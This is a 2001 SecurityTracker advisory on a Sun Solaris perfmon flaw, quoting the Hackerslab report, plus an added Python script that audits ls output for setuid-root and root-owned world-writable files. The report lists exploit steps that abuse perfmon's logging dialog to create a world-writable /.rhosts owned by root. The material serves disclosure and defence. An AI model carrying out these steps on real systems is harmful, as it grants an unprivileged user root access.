SecurityTracker.com

Category:   Application (Generic)  >   Perfmon
Vendors:   Sun
Sun Solaris Perfmon Application Can Create Files with Root-Level Privileges
SecurityTracker Alert ID:  1001144
SecurityTracker URL:  http://securitytracker.com/id/1001144
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 23 2001
Impact:   Modification of system information, Root access via local system
Exploit Included:  Yes  

Description:   Hackerslab reports a vulnerability in the "perfmon" application for Sun Solaris. The application (/opt/JSParm/bin/perfmon), which is used to display system information, can create files on the server with root-level permissions.

By using the logging feature of perfmon, a local user can cause perfmon to create files with root-level privileges on the server.

The author of the source message indicates the following exploit steps:

$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &

Choose "Logging -> Logging File". In the "Selection" part, input the file path you want to create, such as "/.rhosts". The following file will be created:

-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost

Impact:   A local user can create files on the server with root-level permissions. This could readily lead to root-level access to the server.
Solution:   No solution was available at the time of this entry. The author of the source message recommends that you remove setuid permission for perfmon.
Vendor URL:  www.sun.com
Cause:   Access control error
Underlying OS:   UNIX (Solaris - SunOS)

Message History:   None.
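
An added example, not part of the advisory or the source message: a small audit over `ls -l` output that flags setuid-root binaries (the precondition the recommended fix removes) and root-owned, world-writable files carrying an ordinary user's group (the ownership pattern in the listing above). The system group set, the function names and every sample line except the `.rhost` entry are assumptions made for the illustration.

```python
from typing import List, NamedTuple, Optional, Tuple

# Groups treated as privileged. Assumption for this example; adjust per site.
SYSTEM_GROUPS = {"root", "sys", "bin", "other"}

class Entry(NamedTuple):
    mode: str   # 10-character permission string, e.g. "-rw-rw-rw-"
    owner: str
    group: str
    name: str

def parse_ls_line(line: str) -> Optional[Entry]:
    """Parse one `ls -l` line; return None for headers such as 'total 12'."""
    parts = line.split(None, 8)
    if len(parts) < 9 or len(parts[0]) < 10:
        return None
    return Entry(parts[0][:10], parts[2], parts[3], parts[8].strip())

def is_setuid_root(e: Entry) -> bool:
    """Regular file owned by root with the setuid bit set (s or S)."""
    return e.mode[0] == "-" and e.owner == "root" and e.mode[3] in "sS"

def is_root_file_from_user(e: Entry) -> bool:
    """Root-owned, world-writable regular file carrying a non-system group:
    the ownership pattern shown in the advisory's listing."""
    return (e.mode[0] == "-" and e.owner == "root"
            and e.group not in SYSTEM_GROUPS and e.mode[8] == "w")

def audit(listing: str) -> List[Tuple[str, str]]:
    findings = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e is None:
            continue
        if is_setuid_root(e):
            findings.append(("setuid-root", e.name))
        if is_root_file_from_user(e):
            findings.append(("root-owned-world-writable", e.name))
    return findings

# First entry is the listing quoted in the advisory; the rest are constructed.
SAMPLE = """total 12
-rw-rw-rw-   1 root     loveyou         144 Mar  9 03:14 .rhost
-r-sr-xr-x   1 root     bin          123456 Jan  1  2001 perfmon
-rw-r--r--   1 root     sys             512 Jan  1  2001 passwd
-rw-rw-rw-   1 loveyou  loveyou          10 Mar  9 03:15 notes.txt
"""

if __name__ == "__main__":
    for kind, name in audit(SAMPLE):
        print(f"{kind}: {name}")
```
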


 Source Message Contents

Date:  Fri, 23 Mar 2001 17:11:52 +0900
Subject:  [ Hackerslab bug_paper ] SunOS application perfmon vulnerability


==============================================================================

       [ Hackerslab bug_paper ] SunOS application perfmon vulnerability

==============================================================================

File   :   /opt/JSParm/bin/perfmon

SYSTEM : Solaris 2.X

INFO :

parm is a program that displays system information.
parm is a SunOS application.  It's not included in the Solaris basic package.

There is a vulnerability in the perfmon program that lets you create
any file with root privilege, as follows:

$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &


Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex:) /.rhosts

The following file is created in a second.
-rw-rw-rw-   1 root     loveyou         144 Mar  9 03:14 .rhost


SOLUTION :

Remove setuid permission, contact your vendor and get a patch.



==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==


Copyright 2012, SecurityGlobal.net LLC